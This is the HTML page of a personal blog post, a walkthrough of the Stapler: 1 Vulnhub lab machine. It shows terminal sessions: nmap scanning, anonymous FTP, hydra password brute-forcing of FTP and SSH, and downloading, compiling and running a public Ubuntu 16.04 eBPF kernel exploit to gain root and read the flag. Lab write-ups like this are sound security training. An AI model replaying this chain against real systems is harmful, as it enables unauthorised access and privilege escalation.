2016-06-19 18:14:01 -04:00
<!DOCTYPE html>
< html >
< head >
< meta charset = "utf-8" >
2016-07-10 03:19:59 -04:00
< script type = "text/javascript" >
2016-06-19 18:14:01 -04:00
var host = "paul.walko.org";
if ((host == window.location.host) & & (window.location.protocol != "https:"))
window.location.protocol = "https";
< / script >
2016-07-10 03:19:59 -04:00
2016-06-19 18:14:01 -04:00
< script >
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
< / script >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< meta name = "description" content = "Walkthrough for Stapler: 1 VM on Vulnhub" >
< title > Stapler: 1 Vulnhub Walkthrough< / title >
<!-- favicon -->
2016-07-10 03:19:59 -04:00
< link rel = "apple-touch-icon" sizes = "57x57" href = "https://paul.walko.org/favicon/apple-icon-57x57.png" >
< link rel = "apple-touch-icon" sizes = "60x60" href = "https://paul.walko.org/favicon/apple-icon-60x60.png" >
< link rel = "apple-touch-icon" sizes = "72x72" href = "https://paul.walko.org/favicon/apple-icon-72x72.png" >
< link rel = "apple-touch-icon" sizes = "76x76" href = "https://paul.walko.org/favicon/apple-icon-76x76.png" >
< link rel = "apple-touch-icon" sizes = "114x114" href = "https://paul.walko.org/favicon/apple-icon-114x114.png" >
< link rel = "apple-touch-icon" sizes = "120x120" href = "https://paul.walko.org/favicon/apple-icon-120x120.png" >
< link rel = "apple-touch-icon" sizes = "144x144" href = "https://paul.walko.org/favicon/apple-icon-144x144.png" >
< link rel = "apple-touch-icon" sizes = "152x152" href = "https://paul.walko.org/favicon/apple-icon-152x152.png" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "https://paul.walko.org/favicon/apple-icon-180x180.png" >
< link rel = "icon" type = "image/png" sizes = "192x192" href = "https://paul.walko.org/favicon/android-icon-192x192.png" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "https://paul.walko.org/favicon/favicon-32x32.png" >
< link rel = "icon" type = "image/png" sizes = "96x96" href = "https://paul.walko.org/favicon/favicon-96x96.png" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "https://paul.walko.org/favicon/favicon-16x16.png" >
< link rel = "manifest" href = "https://paul.walko.org/favicon/manifest.json" >
2016-06-19 18:14:01 -04:00
< meta name = "msapplication-TileColor" content = "#ffffff" >
< meta name = "msapplication-TileImage" content = "/ms-icon-144x144.png" >
< meta name = "theme-color" content = "#ffffff" >
2016-07-10 03:19:59 -04:00
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/base.css" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/simplePagination.css" >
< script type = "text/javascript" src = "https://paul.walko.org/javascripts/jquery.js" > < / script >
2016-06-19 18:14:01 -04:00
< link rel = "canonical" href = " { { site.url } }{ { page.url } }" / >
<!-- [if lt IE 9]>
2016-07-10 03:19:59 -04:00
< script src = "https://paul.walko.org/javascripts/html5shiv.js" > < / script >
2016-06-19 18:14:01 -04:00
<![endif]-->
2016-07-10 03:19:59 -04:00
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/markdownreader.css" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/pygments_monokai.css" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/code_block.css" >
2016-06-19 18:14:01 -04:00
< / head >
< body >
< header id = "l-header" >
< div class = "container" >
< div class = "row logo" >
< div class = "col-lg-7" >
< h1 > Paul Walko< / h1 >
< / div >
< / div >
< div class = "row navicon" >
< a href = "" > < i class = "fa fa-navicon" > < / i > < / a >
< / div >
< div class = "row navbar" >
< nav class = "col-lg-8 col-md-8 col-xs-12" >
< ul class = "row" >
2016-07-10 03:19:59 -04:00
< li class = "col-lg-3" > < a href = "https://paul.walko.org/" > HOME< / a > < / li >
2016-06-19 18:14:01 -04:00
< li class = "col-lg-3" >
< ul class = "subnav" >
< a href = "javascript:void(0)" > POSTS< / a >
2016-07-10 03:19:59 -04:00
< li > < a href = "https://paul.walko.org/category" > CATEGORY< / a > < / li >
< li > < a href = "https://paul.walko.org/tag" > TAG< / a > < / li >
2016-06-19 18:14:01 -04:00
< / ul >
< / li >
2016-07-10 03:19:59 -04:00
< li class = "col-lg-3" > < a href = "https://paul.walko.org/about" > ABOUT< / a > < / li >
< li class = "col-lg-3" > < a href = "https://paul.walko.org/Walko_Paul-Resume.pdf" > RÉSUMÉ< / a > < / li >
2016-06-19 18:14:01 -04:00
< / ul >
< / nav >
< div class = "search col-lg-4 col-md-4 col-xs-12" >
< form id = "dummySearch" >
< label for = "search" > < / label >
< input id = "search" name = "serach" type = "text" placeholder = "Not That Dummy Search" >
< i class = "fa fa-search" > < / i >
< / form >
< script >
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
< / script >
< / div >
< / div >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div id = "markdown-container" class = "col-lg-9" >
< header >
< p id = "postTitle" > Stapler: 1 Vulnhub Walkthrough< / p >
< ul class = "tags clearfix" >
< li > < i class = "fa fa-tag" > < / i > vulnhub< / li >
< li > < i class = "fa fa-tag" > < / i > hacking< / li >
< / ul >
2016-07-10 03:19:59 -04:00
< p id = "postMeta" > posted on 19 Jun 2016 under category < a href = "https://paul.walko.org/category/" > writeup< / a > < / p >
2016-06-19 18:14:01 -04:00
< / header >
< h1 id = "figure-out-the-ip" > Figure out the IP< / h1 >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:31:55] [~]
-> % nmap -sn 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
< / code > < / pre >
< / div >
< p > Let’ ’ < / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:33:59] [~]
-> % nmap -Pn 192.168.1.135
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
< / code > < / pre >
< / div >
< h1 id = "login-to-ftp" > Login to ftp< / h1 >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:34:57] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp> 221 Goodbye.
paul@archyoga [05:36:17] [~]
-> % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
< / code > < / pre >
< / div >
< p > Turns out it is, and inside is a file named < code class = "highlighter-rouge" > note< / code > which names an ftp user: < code class = "highlighter-rouge" > elly< / code > .
I used hydra to test some common passwords and that worked out:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:39:21] [~]
-> % hydra -l elly -e nsr 92.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
< / code > < / pre >
< / div >
< p > Now we can login to ftp as elly using the password < code class = "highlighter-rouge" > ylle< / code > . On the ftp server there’ < / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:42:07] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
.
.
.
ftp> get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp> 221 Goodbye.
< / code > < / pre >
< / div >
< h1 id = "login-over-ssh--exploit" > Login over ssh & exploit< / h1 >
< p > Using hydra again I discovered a login for ssh from the passwd file:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:42:36] [~]
-> % awk -F':' '{ print $1}' passwd > users
-> % hydra -e nsr -L ./users 192.168.1.135 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
< / code > < / pre >
< / div >
< p > Then once I determined the release I went over to < a href = "http://exploit-db.com" > http://exploit-db.com< / a > and searched “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/< / p >
< p > Now for the exploit:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:50:44] [~]
-> % ssh SHayslett@192.168.1.135
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!
SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘ ’
39772.zip 100%[=====================================================================================================================================================================================================> ] 6.95K --.-KB/s in 0s
2016-06-19 18:49:37 (94.2 MB/s) - ‘ ’
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘ ’
39772.zip 100%[=======================
2016-06-19 18:52:05 (4.75 MB/s) - ‘ ’
SHayslett@red:~/tmp$ unzip *
Archive: 39772.zip
creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘ ’
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in < =60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘ ’
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in < =60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
< / code > < / pre >
< / div >
< p > This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.< / p >
< p > Next, the flag!< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~< (Congratulations)> ~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
< / code > < / pre >
< / div >
< p > Woo!< / p >
< / div >
< div id = "markdown-outline" class = "col-lg-3" >
< / div >
< div id = "disqus_thread" > < / div >
< script type = "text/javascript" >
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
< / script >
< noscript > Please enable JavaScript to view the < a href = "https://disqus.com/?ref_noscript" rel = "nofollow" > comments powered by Disqus.< / a > < / noscript >
< / div >
< / div >
< footer id = "l-footer" >
< div class = "container" >
< div class = "row" >
< div id = "contact" class = "col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9" >
< h3 > CONTACT< / h3 >
< div class = "row" >
< address id = "address" class = "col-lg-6 col-md-6 col-sm-6" >
United States< br >
Paul Walko< br >
< / address >
< ul class = "col-lg-6 col-md-6 col-sm-6" >
< li class = "email" > < i class = "fa fa-envelope" > < / i > < a href = "mailto:paulsw.pw@gmail.com" > paulsw.pw@gmail.com< / a > < / li >
< li class = "github" > < i class = "fa fa-github" > < / i > < a href = "https://www.github.com/paulwalko" > https://www.github.com/paulwalko< / a > < / li >
< / ul >
< / div >
< / div >
< / div >
< p id = "legal" >
Copyright (c) 2015 Paul Walko | Powered by < a href = "http://jekyllrb.com" > Jekyll< / a > & < a href = "http://github.com" > GitHub< / a > | designed & built by < a href = "http://unifreak.github.io" > UniFreak< / a >
< / p >
< / div >
< / footer >
2016-07-10 03:19:59 -04:00
< script type = "text/javascript" src = "https://paul.walko.org/javascripts/base.js" > < / script >
2016-06-19 18:14:01 -04:00
2016-07-10 03:19:59 -04:00
< script type = "text/javascript" src = "https://paul.walko.org/javascripts/markdownreader.js" > < / script >
2016-06-19 18:14:01 -04:00
< / body >
< / html >
